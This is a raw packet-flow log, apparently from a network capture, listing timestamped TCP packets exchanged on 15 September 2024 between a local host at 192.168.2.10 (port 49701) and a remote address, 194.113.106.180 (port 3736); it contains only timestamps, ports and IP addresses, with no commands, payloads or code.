Sep 15, 2024 15:02:27.636601925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636642933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.641468048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641541004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641592026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.641611099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641644955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641675949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641685963 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.641711950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641746044 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641756058 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.641779900 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.641824007 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.644324064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.644359112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.644395113 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.644402981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.644428968 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.644464016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.644470930 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.644500017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.644537926 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.644583941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659187078 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659236908 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.659327984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659360886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659409046 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.659420967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659455061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659490108 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659492970 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.659523010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659555912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.659563065 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.662870884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.662919998 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.662924051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.662961006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.662992954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663002968 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.663028955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663069010 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.663079023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663115025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663145065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663153887 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.663213968 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663249016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663255930 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.663283110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663316011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663321972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.663350105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663398027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663402081 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.663436890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663470984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.663476944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.668977976 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.675554991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.687736034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.687788963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.687788010 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.687824965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.687858105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.687865973 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.687892914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.687925100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.687933922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.687963963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.688004971 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.689563990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689615011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689650059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689662933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.689683914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689719915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689726114 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.689752102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689785957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.689791918 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.697813988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.697844028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.697863102 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.697896957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.697930098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.697937965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.697966099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.698000908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.698008060 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.698035002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.698071003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.698075056 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.706383944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706396103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706408978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706428051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.706438065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706450939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706454039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.706464052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706475973 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.706501961 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.706523895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.709856033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709867954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709883928 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709896088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709906101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709912062 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.709920883 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709929943 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.709934950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709948063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709955931 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.709963083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.709995985 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.715167046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715177059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715194941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715207100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715209007 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.715218067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715235949 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.715240002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715254068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715259075 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.715265036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715276957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.715286970 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.715323925 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.716186047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716203928 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716213942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716242075 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.716268063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716289043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716301918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716312885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716315031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.716325998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.716341019 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.716367006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.717168093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717230082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717276096 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.717309952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717320919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717333078 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717344046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717355967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717355967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.717366934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.717387915 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.717406988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.720587015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720597982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720622063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720623970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720633984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720638037 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.720642090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720654011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720662117 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.720668077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.720696926 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.720716953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.724796057 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724813938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724819899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724855900 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724858999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.724870920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724896908 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.724904060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724915028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724925041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.724944115 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.724961042 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.726818085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726830006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726843119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726852894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726875067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726876974 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.726885080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726895094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.726896048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726908922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726921082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.726927996 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.726963043 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.732155085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732202053 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.732209921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732261896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732295036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732304096 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.732328892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732362032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732368946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.732397079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732429981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.732433081 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.735266924 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735313892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.735317945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735353947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735402107 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.735404015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735439062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735471010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735477924 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.735503912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735537052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.735546112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.739392042 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.739425898 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.763441086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763506889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.763514042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763551950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763585091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763597965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.763621092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763653994 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763667107 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.763689995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763726950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.763736010 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764494896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764525890 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764545918 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764561892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764609098 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764628887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764672995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764714003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764729977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764781952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764810085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764822960 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764843941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764879942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764882088 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764914036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764946938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.764977932 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.764993906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765026093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765032053 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.765060902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765088081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765103102 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.765124083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765156984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765166998 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.765188932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765225887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.765228033 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.778300047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778331995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778358936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.778383970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778419018 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778430939 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.778453112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778486013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778493881 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.778523922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.778568983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.778578997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.779416084 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.779438019 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.779921055 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.779969931 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.779978991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.780015945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.780050039 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.780061007 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.780086040 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.780118942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.780128956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.780154943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.780205011 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.788455963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788525105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788558960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788590908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788625002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788656950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788666964 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.788667917 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.788691998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788714886 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.788731098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.788777113 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.796540022 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.796590090 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.797070026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797105074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797158003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.797229052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797262907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797296047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797311068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.797331095 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797364950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797377110 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.797399998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.797446966 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.800527096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.800576925 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.800611019 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.800628901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.800646067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.800679922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.800689936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.800714970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.800760031 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.800764084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805247068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.805294991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.805759907 CEST	3736	49701	194.113.106.180	192.168.2.10
